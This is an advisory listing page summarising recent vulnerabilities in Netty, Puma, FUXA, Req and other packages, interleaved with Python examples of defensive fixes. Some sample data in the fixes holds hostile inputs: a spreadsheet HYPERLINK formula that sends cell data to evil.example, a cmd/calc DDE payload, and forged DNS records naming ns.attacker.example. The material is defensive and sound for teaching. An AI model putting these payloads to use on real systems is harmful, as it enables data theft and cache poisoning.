Security Advisories
Browse security advisories and track which Dependabot PRs address them.
Total Advisories: 32,415
With Dependabot PRs: 2,929
Critical Severity: 4,315
High Severity: 11,273
Unspecified security issues.
CPANSA-MySQL-Admin-1-1
Unspecified security issues.
cpan
No PRs yet
Pheditor: OS Command Injection in terminal handler via unsanitized 'dir' parameter
GHSA-jvc5-6g7q-c843 CVE-2026-48030 CRITICAL about 15 hours ago
### Summary
An OS Command Injection vulnerability in the terminal action handler allows any authenticated user to execute arbitrary OS commands by...
packagist
No PRs yet
Dex: Token-exchange endpoint is missing AllowedConnectors enforcement
GHSA-7qjx-gp9h-65qj HIGH about 15 hours ago
## Summary
`server/handlers.go::handleTokenExchange` (lines 1804-1893) does not call `isConnectorAllowed(client.AllowedConnectors, connID)` before...
go
No PRs yet
PhoenixStorybook has cross-session PubSub topic injection via URL parameter
GHSA-mrhx-6pw9-q5fh CVE-2026-47068 LOW about 15 hours ago
### Summary
The storybook iframe LiveView accepts a PubSub topic from the URL query string and broadcasts its own pid onto that topic with no check...
hex
No PRs yet
PhoenixStorybook: Unbounded atom creation from LiveView event params (atom-table DoS)
GHSA-833p-95jq-929q CVE-2026-8469 HIGH about 15 hours ago
### Summary
An attacker who can deliver `psb-assign`, `psb-toggle`, `psb-set-theme`, `upper-tab-navigation`, `lower-tab-navigation`, `playground-ch...
hex
No PRs yet
PhoenixStorybook: Unauthenticated remote code execution via HEEx template injection in phoenix_storybook playground
GHSA-55hg-8qxv-qj4p CVE-2026-8467 CRITICAL about 15 hours ago
### Summary
An unsafe HEEx template generation vulnerability allows any unauthenticated user to execute arbitrary code on the server. The phoenix_s...
hex
No PRs yet
SymfonyRuntime CVE-2024-50340 Patch Bypass: Web Requests Can Still Set APP_ENV/APP_DEBUG via parse_str/SAPI Argv Mismatch
GHSA-fqc7-9xjw-jrh3 CVE-2026-47767 MODERATE about 15 hours ago
### Description
CVE-2024-50340 (GHSA-x8vp-gf4q-mw5j) addressed an issue where, with `register_argc_argv=On`, a crafted query string let an unauthe...
packagist
No PRs yet
Net::IMAP: Command Injection via ID command argument
GHSA-46q3-7gv7-qmgg CVE-2026-47242 MODERATE about 16 hours ago
### Summary
Two `Net::IMAP` commands, `#id` and `#enable`, do not validate their arguments. Arguments to either command could be used by an attac...
rubygems
2 Dependabot PRs
Net::IMAP: Denial of Service via incomplete raw argument validation
GHSA-c4fp-cxrr-mj66 CVE-2026-47241 LOW about 18 hours ago
### Summary
Several Net::IMAP commands accept a raw string argument which is only validated to prevent CRLF injection and then sent verbatim. If ...
rubygems
2 Dependabot PRs
Net::IMAP: Command Injection via non-synchronizing literal in "raw" argument
GHSA-8p34-64r3-mwg8 CVE-2026-47240 MODERATE about 18 hours ago
Several Net::IMAP commands accept a "raw data" argument that is sent verbatim after validation to prevent command injection. However, if a server ...
rubygems
2 Dependabot PRs
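The three Net::IMAP entries above share one root cause: values reaching the wire without being encoded as IMAP strings. The following is an added example, not Net::IMAP's code, of the encoding discipline that closes that class: every untrusted value becomes either a quoted string or a synchronizing literal whose declared byte count bounds what the server treats as data. The ID command builder and the `render` helper (which stands in for the real send/wait-for-continuation loop) are illustrative.

```python
"""Added example (not Net::IMAP's code): encoding untrusted IMAP string arguments.

A value is sent as a quoted string when it is ASCII without CR, LF or NUL,
otherwise as a synchronizing literal whose declared length bounds exactly
what the server reads as data. Nothing is concatenated raw, so a value such
as 'x\\r\\nA2 LOGOUT' can never be parsed as a second command.
"""


def encode_string(value: str) -> list:
    """Wire chunks for one RFC 3501 'string' (quoted or literal).

    A chunk is bytes to send, or ("continue", data): send the preceding
    '{n}' marker plus CRLF, wait for the server's '+' continuation request,
    then send exactly data.
    """
    if value.isascii() and not any(c in value for c in "\r\n\x00"):
        quoted = value.replace("\\", "\\\\").replace('"', '\\"')
        return [('"' + quoted + '"').encode("ascii")]
    data = value.encode("utf-8")
    if b"\x00" in data:
        raise ValueError("NUL is not allowed in an IMAP literal")
    return [b"{%d}" % len(data), ("continue", data)]


def build_id_command(tag: str, fields: dict) -> list:
    """RFC 2971 ID command with every field name and value encoded, never raw."""
    chunks = [tag.encode("ascii"), b" ID ("]
    for i, (name, value) in enumerate(fields.items()):
        if i:
            chunks.append(b" ")
        chunks += encode_string(name)
        chunks.append(b" ")
        chunks += encode_string(value) if value is not None else [b"NIL"]
    chunks.append(b")\r\n")
    return chunks


def render(chunks, server_continues: bool = True) -> bytes:
    """Flatten chunks into the bytes a client sends, given the server's reply to
    each literal. Demo stand-in for the real send / wait-for-'+' loop."""
    out = b""
    for chunk in chunks:
        if isinstance(chunk, tuple):
            if not server_continues:
                raise RuntimeError("server rejected the literal; command aborted")
            out += b"\r\n" + chunk[1]
        else:
            out += chunk
    return out
```

With a literal, the CRLF inside the malicious value is just two of the fifteen bytes the server was told to expect, so no command boundary is created.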
shell-quote quote() does not escape newlines in object .op values
GHSA-w7jw-789q-3m8p CVE-2026-9277 CRITICAL about 22 hours ago
### Summary
`shell-quote`'s `quote()` function did not validate object-token inputs against the operator model used by `parse()`. The `.op` field ...
npm
No PRs yet
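The shell-quote entry describes a `quote()` that emitted whatever string an object token carried in `.op`. As an added example (not shell-quote's code, and written in Python rather than JavaScript), here is the shape of the fix: operator tokens are checked against the same operator table the parser uses, and anything else is refused instead of emitted verbatim. The operator set below is assumed for the demo, not copied from shell-quote.

```python
"""Added example (not shell-quote's code): quote() that validates operator tokens.

Tokens are plain strings (shell-escaped) or {"op": X} objects. X must be one
of the operators the parser model knows; an unchecked value such as "\n" or
"; id" would otherwise be written into the command line as a separator.
"""
import shlex

# Assumed operator table for the demo, mirroring what a parse()-style
# tokenizer would recognise. Not shell-quote's actual table.
SHELL_OPERATORS = frozenset(
    ["||", "&&", ";;", "|&", "<(", ">>", ">&", "&", ";", "(", ")", "|", "<", ">"]
)


def quote(tokens) -> str:
    """Join tokens into one shell command string, escaping every plain string."""
    parts = []
    for tok in tokens:
        if isinstance(tok, dict) and "op" in tok:
            op = tok["op"]
            if op not in SHELL_OPERATORS:
                # Reject rather than emit: this is the gap the advisory describes.
                raise ValueError(f"unknown shell operator: {op!r}")
            parts.append(op)
        elif isinstance(tok, str):
            parts.append(shlex.quote(tok))  # single-quoted unless safe as-is
        else:
            raise TypeError("token must be a string or an {'op': ...} object")
    return " ".join(parts)
```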
Unbounded integer parsing in the Version module enables CPU and memory exhaustion denial of service
EEF-CVE-2026-49762 GHSA-w2h8-8x3g-278p CVE-2026-49762 MEDIUM about 22 hours ago
## Summary
Uncontrolled Resource Consumption vulnerability in the Elixir standard library's Version module allows an attacker who controls a versi...
No PRs yet
Puma PROXY Protocol v1 Accepts Repeated Protocol Headers on Persistent Connections
GHSA-2vqw-3mp8-cgmx CVE-2026-47737 HIGH 1 day ago
### Impact
Puma is vulnerable to source IP spoofing when `set_remote_address proxy_protocol: :v1` is enabled and persistent connections are used.
...
rubygems
7 Dependabot PRs
Puma PROXY Protocol v1 Parser Allows Remote Memory Exhaustion
GHSA-qpgp-93vx-g8v8 CVE-2026-47736 HIGH 1 day ago
### Impact
[PROXY protocol support for Puma](https://github.com/puma/puma/issues/2651) was added in version 5.5.0.
When PROXY protocol v1 support...
rubygems
7 Dependabot PRs
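Both Puma entries concern the PROXY protocol v1 line: one because it was honoured again on a persistent connection after the first request, the other because the parser could be made to buffer without bound. The following is an added example, not Puma's code, of a connection-scoped parser that handles both: it accepts the header at most once, only as the very first bytes, and caps the buffered line at the spec's 107-byte v1 maximum (CRLF included). The class and function names are the example's own.

```python
"""Added example (not Puma's code): defensive PROXY protocol v1 handling.

A header is honoured at most once, only at the start of the connection, and
the parser never buffers more than the spec's 107-byte maximum line while
waiting for CRLF.
"""
import ipaddress

PROXY_V1_MAX_LINE = 107  # PROXY protocol spec: max v1 line length including CRLF


class ProxyV1Connection:
    """State for one TCP connection that may begin with a PROXY v1 line."""

    def __init__(self):
        self.remote_addr = None       # (ip, port) from the header, or None
        self.header_consumed = False  # True once the one-and-only decision is made
        self._buf = b""

    def feed(self, data: bytes) -> bytes:
        """Consume socket bytes; return what the HTTP parser should see."""
        if self.header_consumed:
            # Persistent connection: a later "PROXY ..." line is ordinary request
            # data and must not rewrite the client address again.
            return data
        self._buf += data
        if not self._buf.startswith(b"PROXY "[: len(self._buf)]):
            self.header_consumed = True  # no header on this connection
            rest, self._buf = self._buf, b""
            return rest
        end = self._buf.find(b"\r\n")
        if end == -1:
            if len(self._buf) > PROXY_V1_MAX_LINE:
                raise ValueError("PROXY v1 header exceeds 107 bytes without CRLF")
            return b""  # wait for more bytes; buffering is bounded above
        line, rest = self._buf[:end], self._buf[end + 2:]
        if len(line) + 2 > PROXY_V1_MAX_LINE:
            raise ValueError("PROXY v1 header too long")
        self.remote_addr = parse_proxy_v1_line(line)
        self.header_consumed = True
        self._buf = b""
        return rest


def parse_proxy_v1_line(line: bytes):
    """Parse 'PROXY TCP4|TCP6 src dst sport dport' (no CRLF) into (src_ip, sport)."""
    parts = line.decode("ascii").split(" ")
    if len(parts) >= 2 and parts[1] == "UNKNOWN":
        return None  # proxy could not determine the client; keep the socket address
    if len(parts) != 6 or parts[0] != "PROXY" or parts[1] not in ("TCP4", "TCP6"):
        raise ValueError("malformed PROXY v1 header")
    src, dst = ipaddress.ip_address(parts[2]), ipaddress.ip_address(parts[3])
    want = 4 if parts[1] == "TCP4" else 6
    if src.version != want or dst.version != want:
        raise ValueError("address family does not match INET protocol")
    sport, dport = int(parts[4]), int(parts[5])
    if not (0 <= sport <= 65535 and 0 <= dport <= 65535):
        raise ValueError("port out of range")
    return (str(src), sport)
```

Only a trusted load balancer should be allowed to reach a listener with PROXY support enabled; the parser above limits damage, it does not authenticate the sender.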
Arc has an authenticated arbitrary local-file read via DuckDB I/O functions that bypasses RBAC table-level checks
GHSA-p2j4-c4g6-rpf5 CVE-2026-47735 HIGH 1 day ago
### Summary
Arc's user-SQL validator (`internal/api/query.go:ValidateSQLRequest`) blocked only `read_parquet(` and `arc_partition_agg(` via regex ...
go
No PRs yet
Dulwich has unbounded memory allocation in receive-pack from crafted thin packs
GHSA-xrvj-v92f-53gj CVE-2026-47734 MODERATE 1 day ago
## Impact
An uncontrolled-resource-consumption (memory exhaustion) denial-of-service vulnerability (CWE-400 / CWE-789).
A client with push access...
pypi
No PRs yet
nebula-mesh: GET /api/v1/audit-log discloses all entries to any operator
GHSA-qm33-p5p9-f8vg CVE-2026-47726 HIGH 1 day ago
`internal/api/audit.go:12` — `handleGetAuditLog` does no admin check. The route is bearer-auth gated only; any operator API key returns the full au...
go
No PRs yet
nebula-mesh's web UI lacks CSRF tokens on /ui/* mutating endpoints
GHSA-273q-qgh5-wrj6 CVE-2026-47725 HIGH 1 day ago
Every `/ui/*` POST / PUT / PATCH / DELETE route processes the request as soon as the session cookie validates. `SameSite=Lax` on the session cookie...
go
No PRs yet
nebula-mesh: API endpoints lack ownership checks, enabling cross-operator privilege escalation
GHSA-598g-h2vc-h5vg CVE-2026-47724 CRITICAL 1 day ago
The `/api/v1/*` route surface trusts the bearer token alone for authorisation on most endpoints. The codebase itself admits this at `internal/api/h...
go
No PRs yet
nebula-mesh: Web UI and API responses lack security headers (CSP, X-Frame-Options, HSTS, etc.)
GHSA-w7w5-5gcp-38rw CVE-2026-47723 HIGH 1 day ago
None of the response paths in `internal/web/` or `internal/api/` set the standard browser-security headers. `grep` for `Content-Security-Policy`, `...
go
No PRs yet
nebula-mesh: Host advanced overrides allow YAML injection into agent config.yml
GHSA-7hp6-g3pq-3pc3 CVE-2026-47722 HIGH 1 day ago
`internal/configgen/generator.go:86,108,119` interpolates the operator-supplied `ListenHost` and `TunDevice` fields raw into a `text/template` that...
go
No PRs yet
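The nebula-mesh config-generation entry is a templating bug: operator-supplied strings dropped into a YAML text template. As an added example (not nebula-mesh's code), the following contrasts a format-string stand-in for that template with a serialiser that emits each value as a YAML double-quoted scalar, so a newline or colon in the input stays inside one value instead of opening a new key. The template shape, the `unexpected_key` payload and the `top_level_keys` helper are the example's own, not taken from the project.

```python
"""Added example (not nebula-mesh's code): serialise, don't template, config values.

render_unsafe() mimics raw text-template interpolation; render_safe() routes
every value through yaml_quote(), which escapes quotes, backslashes and all
control characters so the scalar cannot end early.
"""

# Assumed template shape for the demo; not the project's real config.yml template.
AGENT_CONFIG_TEMPLATE = "listen:\n  host: {listen_host}\ntun:\n  dev: {tun_device}\n"


def render_unsafe(listen_host: str, tun_device: str) -> str:
    """Vulnerable pattern: values dropped into the template verbatim."""
    return AGENT_CONFIG_TEMPLATE.format(listen_host=listen_host, tun_device=tun_device)


def yaml_quote(value: str) -> str:
    """Encode value as a YAML double-quoted scalar; every character stays inside it."""
    out = ['"']
    for ch in value:
        code = ord(ch)
        if ch == '"':
            out.append('\\"')
        elif ch == "\\":
            out.append("\\\\")
        elif code < 0x20 or code == 0x7F:
            out.append("\\x%02x" % code)  # YAML \xHH escape: newline can't end the scalar
        else:
            out.append(ch)
    out.append('"')
    return "".join(out)


def render_safe(listen_host: str, tun_device: str) -> str:
    """Fixed pattern: each operator-controlled value is a quoted scalar."""
    return AGENT_CONFIG_TEMPLATE.format(
        listen_host=yaml_quote(listen_host), tun_device=yaml_quote(tun_device)
    )


def top_level_keys(yaml_text: str) -> list:
    """Demo helper: names of unindented 'key:' lines in the rendered document."""
    keys = []
    for line in yaml_text.splitlines():
        if line and not line[0].isspace() and ":" in line:
            keys.append(line.split(":", 1)[0])
    return keys
```

In a real generator the better fix is to build a dict and hand it to a YAML library's dumper; the hand-rolled quoting above is only to make the two outputs comparable without a dependency.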
FUXA's scheduler API missing admin check enables operator-to-admin escalation via scheduled device actions
GHSA-8ghr-w65f-j3qr CVE-2026-47721 MODERATE 1 day ago
## Summary
An authorization issue in the Scheduler API allowed authenticated non-admin users to create or modify scheduled actions that should be ...
npm
No PRs yet
FUXA has SQL Injection in its TDengine DAQ connector via backslash bypass of escapeTdString
GHSA-h9fj-c2qr-76g2 CVE-2026-47720 MODERATE 1 day ago
## Summary
The TDengine DAQ storage connector's `escapeTdString` at `server/runtime/storage/tdengine/index.js:10` doubles single quotes but does n...
npm
No PRs yet
FUXA: Unauthenticated SSRF via Socket.IO DEVICE_WEBAPI_REQUEST and DEVICE_PROPERTY with response reading
GHSA-w86f-rf9w-h3x6 CVE-2026-47719 HIGH 1 day ago
## Summary
An unauthenticated attacker (Alice) connects to FUXA's Socket.IO endpoint and emits a `device-webapi-request` event whose `property.add...
npm
No PRs yet
Dulwich doesn't sanitize commit subjects in `porcelain.format_patch`
GHSA-555p-6grf-mh7f CVE-2026-47712 LOW 1 day ago
### Impact
dulwich.porcelain.format_patch(outdir=...) derives each patch filename from the commit's subject line. Prior to this fix, get_summary o...
pypi
1 Dependabot PR
Poweradmin: CSV Injection in log export endpoints allows formula execution in spreadsheet applications
GHSA-3h6h-67x3-cv5x CVE-2026-47693 MODERATE 1 day ago
Description:
### Summary
Poweradmin v4.4.0 is vulnerable to CSV Injection (Formula Injection) in its log export functionality. User-controlled da...
packagist
No PRs yet
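For the Poweradmin CSV injection entry, the following is an added example (not Poweradmin's code) of neutralising user-controlled cells before they reach a CSV export: any string whose first non-blank character is one a spreadsheet treats as a formula trigger is prefixed with an apostrophe, which forces text mode. The log rows are constructed for the demo.

```python
"""Added example (not Poweradmin's code): neutralising formula injection in CSV exports.

Spreadsheets evaluate a cell that starts with =, +, -, or @; a leading tab or
carriage return can hide one of those. Numeric fields are passed through
untouched so negative numbers are not mangled; only strings are neutralised.
"""
import csv
import io

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")


def neutralize_cell(value) -> str:
    """Return a cell that spreadsheets will display as text, never evaluate."""
    if value is None:
        return ""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)  # trusted numeric column; "-5" here is a number, not input
    text = str(value)
    if text.lstrip()[:1] and text.lstrip()[0] in FORMULA_TRIGGERS:
        return "'" + text  # apostrophe forces text mode and is not displayed
    return text


def export_log_csv(rows, fieldnames) -> str:
    """Write log rows to CSV text with every user-controlled string neutralised."""
    out = io.StringIO()
    writer = csv.DictWriter(out, fieldnames=fieldnames, quoting=csv.QUOTE_ALL)
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k)) for k in fieldnames})
    return out.getvalue()


# Constructed sample rows: the message column is free text typed by users.
SAMPLE_ROWS = [
    {"id": 1, "user": "alice", "message": "Zone example.com updated"},
    {"id": 2, "user": "mallory", "message": '=HYPERLINK("http://evil.example/?x"&A1,"click")'},
    {"id": 3, "user": "mallory", "message": "\t+cmd|' /C calc'!A0"},
]
```

Quoting every field (`QUOTE_ALL`) also keeps an embedded comma or quote from splitting the neutralised value across cells.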
Anyquery: AppleScript/JXA Code Injection via Unescaped URL in macOS Chrome Plugin
GHSA-hrj8-hjv8-mgwc CVE-2026-47252 CRITICAL 1 day ago
# AppleScript/JXA Code Injection via Unescaped URL in macOS Chrome Plugin
| Field | Value |
| ---------------- | ----- |
| Repository ...
go
No PRs yet
Netty has Insufficient Bailiwick Validation for NS Records
GHSA-5pvg-856g-cp85 CVE-2026-47691 HIGH 1 day ago
### Summary
Netty's `DnsResolveContext` insufficiently validates the bailiwick of NS records, enabling DNS Cache Poisoning. An attacker controlling...
maven
5 Dependabot PRs
Netty HTTP/2: Advertised MAX_CONCURRENT_STREAMS are not enforced
GHSA-5x3r-wrvg-rp6q CVE-2026-47244 MODERATE 1 day ago
### Impact
DefaultHttp2Connection.DefaultEndpoint initialises maxActiveStreams/maxStreams to Integer.MAX_VALUE, and Http2Settings never inserts SET...
maven
5 Dependabot PRs
Netty: SCTP reassembly nests buffers without bound
GHSA-5xrh-qmmq-w6ch CVE-2026-46340 HIGH 1 day ago
For each non-complete SctpMessage fragment the handler does `fragments.put(streamId, Unpooled.wrappedBuffer(frag, byteBuf))`, wrapping the previous...
maven
5 Dependabot PRs
Netty Vulnerable to DNS Cache Poisoning via Missing Bailiwick Checks in CNAME Records
GHSA-676x-f7gg-47vc CVE-2026-45674 HIGH 1 day ago
### Summary
Netty's DnsResolveContext fails to validate the origin (bailiwick) of CNAME records in DNS responses.
### Details
In `io.netty.resolve...
maven
5 Dependabot PRs
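The two Netty bailiwick entries (NS records above, CNAME records here) are the same check applied to two record types. The following is an added example, not Netty's code, of that check in isolation: a record from a response is kept only if its owner name is at or below the zone the responding server was delegated for, and the records for a CNAME target outside that zone are dropped so they can be resolved separately. The response is constructed for the demo.

```python
"""Added example (not Netty's code): bailiwick filtering of DNS response records.

A record is trusted only if its owner name equals, or is a subdomain of, the
zone the responding server was delegated for. NS, glue and CNAME-target
records outside that zone are discarded so one response cannot seed the
cache with data for an unrelated domain.
"""


def _labels(name: str) -> list:
    """Lower-cased labels, root first, trailing dot ignored."""
    return [l for l in name.lower().rstrip(".").split(".") if l][::-1]


def in_bailiwick(record_name: str, zone: str) -> bool:
    """True if record_name equals zone or is a subdomain of it."""
    r, z = _labels(record_name), _labels(zone)
    return len(r) >= len(z) and r[: len(z)] == z


def filter_response(zone: str, records: list) -> tuple:
    """Split (owner, rtype, rdata) records into (accepted, rejected) by bailiwick."""
    accepted, rejected = [], []
    for owner, rtype, rdata in records:
        (accepted if in_bailiwick(owner, zone) else rejected).append((owner, rtype, rdata))
    return accepted, rejected


# Constructed response to a query for www.example.com, answered by a server
# delegated for example.com. Tuples are (owner, type, rdata).
SAMPLE_RESPONSE = [
    ("www.example.com", "CNAME", "cdn.other.example"),
    ("example.com", "NS", "ns1.example.com"),
    ("ns1.example.com", "A", "192.0.2.1"),
    ("victim.example", "NS", "ns.attacker.example"),  # out of bailiwick
    ("victim.example", "A", "203.0.113.66"),          # out of bailiwick
    ("cdn.other.example", "A", "203.0.113.1"),        # CNAME target: resolve it separately
]
```

The CNAME record itself is in-bailiwick (its owner is www.example.com) and is kept; what the resolver must not do is also accept the A record for cdn.other.example from this server, which is exactly the poisoning path the advisory describes.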
Netty: DNS Cache Poisoning due to Predictable PRNG and Default Static Source Port
GHSA-xmv7-r254-6q78 CVE-2026-45673 MODERATE 1 day ago
### Summary
Netty's DNS resolver uses a predictable PRNG for generating DNS transaction IDs and defaults to a static UDP source port. This combinat...
maven
5 Dependabot PRs
Netty: Unix-socket fd receive leaks descriptors when peer sends two at once
GHSA-w573-9ffj-6ff9 CVE-2026-45536 MODERATE 1 day ago
netty_unix_socket_recvFd sets msg_control to `char control[CMSG_SPACE(sizeof(int))]` (line 940) — 24 bytes on 64-bit Linux. A peer-sent SCM_RIGHTS ...
maven
5 Dependabot PRs
Netty: SNI handler pre-allocates up to 16 MiB from nine attacker bytes
GHSA-x4gw-5cx5-pgmh CVE-2026-45416 HIGH 1 day ago
SslClientHelloHandler.decode() reads the 24-bit TLS handshake length and, when the ClientHello does not fit in the first record, eagerly allocates ...
maven
5 Dependabot PRs
PHPSpreadsheet has a patch bypass for CVE-2026-34084
GHSA-87m4-826x-3crx CVE-2026-45034 CRITICAL 1 day ago
## Summary
CVE-2026-34084 was patched by the helper `File::prohibitWrappers`. The helper calls `parse_url($filename, PHP_URL_SCHEME)` and then che...
packagist
No PRs yet
Netty's Default QUIC token handler accepts any client-supplied token
GHSA-cmm3-54f8-px4j CVE-2026-44894 HIGH 1 day ago
NoQuicTokenHandler is the tokenHandler used when the application does not set one. Its writeToken() returns false (server will not send Retry — acc...
maven
3 Dependabot PRs
Netty: HAProxy SSL TLV parsing leaks retained slice on invalid TLV length
GHSA-cc37-9q2j-3hfv CVE-2026-44893 HIGH 1 day ago
When decoding a PP2_TYPE_SSL TLV, HAProxyMessage.readNextTLV() first calls `header.retainedSlice(header.readerIndex(), length)` and only then reads...
maven
8 Dependabot PRs
Netty has a Vulnerable Default Configuration Which Leads to Denial of Service via Unbounded HTTP/3 Header Size
GHSA-c2rx-5r8w-8xr2 CVE-2026-44892 HIGH 1 day ago
### Summary
The default configuration of the `Http3ConnectionHandler` in the Netty HTTP/3 codec lacks an enforced maximum header size limit. When a...
maven
3 Dependabot PRs
Netty has Unbounded Direct Memory Consumption in its RedisDecoder
GHSA-6ghj-frrj-jjj3 CVE-2026-44890 HIGH 1 day ago
### Summary
An attacker can cause DoS by sending crafted Redis payloads across multiple connections without `\r\n`. This exhausts the server's dire...
maven
8 Dependabot PRs
Netty: Memory Exhaustion in RedisArrayAggregator due to Deeply Nested Arrays
GHSA-3244-j874-rhc2 CVE-2026-44250 HIGH 1 day ago
### Summary
An attacker can cause DoS by sending a crafted Redis payload with deeply nested arrays. This forces the server to allocate a massive nu...
maven
8 Dependabot PRs
Netty has an IPv6 Subnet Filter Bypass via Incorrect Comparator Masking
GHSA-3qp7-7mw8-wx86 CVE-2026-44249 HIGH 1 day ago
### Summary
An attacker can bypass IPv6 subnet rules due to an incorrect masking operation in IpSubnetFilterRule.compareTo(). Valid public IP addre...
maven
8 Dependabot PRs
actual Allows Electron to Run As Node
GHSA-7rvm-xjpp-63r9 CVE-2026-42890 MODERATE 2 days ago
## Summary
An Electron "run as Node" vulnerability was identified in `actual` (macOS application, version `25.x (Electron 39.2.7)`).
**Vulnerability...
npm
No PRs yet
Authlib OAuth 2.0 has Open Redirect in Authorization API that allows attacker-controlled redirect_uri through unsupported response_type
GHSA-w8p2-r796-3vmq CVE-2026-41479 MODERATE 2 days ago
### Summary
Authlib's OAuth 2.0 authorization endpoint can be turned into an unauthenticated open redirect when a request uses an unsupported respo...
pypi
No PRs yet
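The Authlib entry is about the order of checks at an authorization endpoint. The following is an added example, not Authlib's code, of the ordering RFC 6749 §4.1.2.1 requires: an unknown client or an unregistered `redirect_uri` must be answered inline, never by redirect, and only after `redirect_uri` has been matched against the registration may an error such as `unsupported_response_type` be sent back to it. The client registry and the `AuthorizeOutcome` type are constructed for the demo.

```python
"""Added example (not Authlib's code): check ordering at an OAuth 2.0 authorize endpoint.

Errors about the client or the redirect_uri are rendered in place; only a
registered redirect_uri ever receives an error redirect.
"""
from urllib.parse import urlencode, urlsplit

# Constructed registry: client_id -> exact registered redirect URIs.
CLIENTS = {"app-123": {"https://app.example/cb"}}
SUPPORTED_RESPONSE_TYPES = {"code"}


class AuthorizeOutcome:
    """kind is 'display' (render error inline), 'redirect' (to client) or 'proceed'."""

    def __init__(self, kind, location=None, error=None):
        self.kind, self.location, self.error = kind, location, error


def _error_redirect(uri: str, error: str, state) -> str:
    query = {"error": error}
    if state is not None:
        query["state"] = state
    return uri + ("&" if urlsplit(uri).query else "?") + urlencode(query)


def authorize(params: dict) -> AuthorizeOutcome:
    client = CLIENTS.get(params.get("client_id", ""))
    if client is None:
        return AuthorizeOutcome("display", error="invalid_client")
    redirect_uri = params.get("redirect_uri")
    if redirect_uri is None and len(client) == 1:
        redirect_uri = next(iter(client))  # single registered URI may be implied
    if redirect_uri not in client:  # exact string match; no prefix or wildcard rules
        return AuthorizeOutcome("display", error="invalid_request")
    # From here on redirect_uri is a registered URI, so redirecting errors is safe.
    state = params.get("state")
    if params.get("response_type", "") not in SUPPORTED_RESPONSE_TYPES:
        return AuthorizeOutcome(
            "redirect", location=_error_redirect(redirect_uri, "unsupported_response_type", state)
        )
    return AuthorizeOutcome("proceed")  # continue to authentication and consent
```

The bug class the advisory describes is the reverse order: deciding that `response_type` is unsupported first and redirecting the error to whatever `redirect_uri` the request carried.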
HTTP Response Splitting via Non-VCHAR Bytes in cow_http_struct_hd:escape_string/2
EEF-CVE-2026-43966 CVE-2026-43966 MEDIUM 2 days ago
## Summary
Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') vulnerability in ninenines cowlib allows ...
hex
No PRs yet
Decompression bomb DoS in Req via auto-decoded archive and compressed response bodies
EEF-CVE-2026-49755 GHSA-655f-mp8p-96gv CVE-2026-49755 HIGH 2 days ago
## Summary
Improper Handling of Highly Compressed Data (Data Amplification) vulnerability in wojtekmach Req allows attacker-controlled HTTP server...
hex
No PRs yet
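For the Req decompression-bomb entry, the following is an added example (not Req's code) of decoding a compressed response body with a hard cap on the decoded size, using zlib's incremental API so the cap is enforced before the memory is spent. The cap value is an assumed policy number; the same idea applies to auto-extracted archives, which are not shown here.

```python
"""Added example (not Req's code): bounded inflate of an HTTP response body.

The body is decompressed incrementally with max_length set to the remaining
budget, so a few kilobytes of gzip cannot expand into gigabytes before the
limit is noticed.
"""
import zlib

MAX_DECODED_BYTES = 10 * 1024 * 1024  # assumed policy cap; tune per endpoint


class DecompressionBombError(ValueError):
    pass


def bounded_decompress(body: bytes, encoding: str, limit: int = MAX_DECODED_BYTES) -> bytes:
    """Decompress a gzip or deflate body, raising once output would exceed limit."""
    if encoding == "gzip":
        d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)
    elif encoding == "deflate":
        d = zlib.decompressobj(wbits=zlib.MAX_WBITS)  # zlib-wrapped deflate
    else:
        raise ValueError(f"unsupported Content-Encoding: {encoding}")
    out = bytearray()
    pending = body
    while pending:
        # Ask for at most one byte beyond the budget: if we get it, it's a bomb.
        out += d.decompress(pending, limit + 1 - len(out))
        if len(out) > limit:
            raise DecompressionBombError(f"decoded body exceeds {limit} bytes")
        pending = d.unconsumed_tail
        if d.eof:
            break
    return bytes(out)
```

Checking `Content-Length` is no defence here: the attacker controls the compressed size, and the ratio, not the input size, is the problem.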
Multipart form-data header injection in Req via unescaped name/filename/content_type
EEF-CVE-2026-49756 GHSA-px9f-whj3-246m CVE-2026-49756 LOW 2 days ago
## Summary
Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in wojtekmach Req allows multipart parameter smuggling via a...
hex
No PRs yet
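The cowlib entry (non-VCHAR bytes surviving `escape_string`) and the Req multipart entry (unescaped `name`/`filename`/`content_type`) are both header-value escaping failures. The following is an added example, neither cowlib's nor Req's code, of one escaper that enforces the RFC 9110 quoted-string alphabet and a multipart part-header builder on top of it; the media-type regex is the example's own approximation of the token grammar.

```python
"""Added example (not cowlib's or Req's code): header-safe quoted-string escaping.

Inside a quoted-string only HTAB, SP, VCHAR (0x21-0x7E) and obs-text
(0x80-0xFF) may appear; '"' and '\\' get a backslash. Anything else, CR and
LF above all, is rejected instead of written into the header.
"""
import re

_MEDIA_TYPE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+/[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def escape_quoted_string(value: str) -> str:
    """Return value as an RFC 9110 quoted-string, or raise on a disallowed character."""
    out = ['"']
    for ch in value:
        code = ord(ch)
        if ch in '"\\':
            out.append("\\" + ch)
        elif code == 0x09 or 0x20 <= code <= 0x7E or 0x80 <= code <= 0xFF:
            out.append(ch)
        else:
            # Covers CR, LF, NUL, DEL (0x7F) and anything beyond Latin-1, which
            # would need an RFC 8187 ext-value rather than a quoted-string.
            raise ValueError(f"character U+{code:04X} is not allowed in a header value")
    out.append('"')
    return "".join(out)


def part_headers(name: str, filename: str = None, content_type: str = None) -> bytes:
    """Header block for one multipart/form-data part, CRLF-terminated."""
    disposition = "form-data; name=" + escape_quoted_string(name)
    if filename is not None:
        disposition += "; filename=" + escape_quoted_string(filename)
    lines = ["Content-Disposition: " + disposition]
    if content_type is not None:
        if not _MEDIA_TYPE.match(content_type):
            raise ValueError("content_type must be a bare type/subtype token")
        lines.append("Content-Type: " + content_type)
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")
```

Rejecting rather than stripping is deliberate: a silently stripped byte changes the value the other side sees, and a caller that wants the original bytes needs to know the header cannot carry them.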
gun HTTP/1.1 response buffer has no size limit allowing server-controlled memory exhaustion
EEF-CVE-2026-43973 CVE-2026-43973 HIGH 2 days ago
## Summary
Uncontrolled Resource Consumption vulnerability in ninenines gun (gun\_http module) allows a malicious server to exhaust client memory ...
hex
No PRs yet
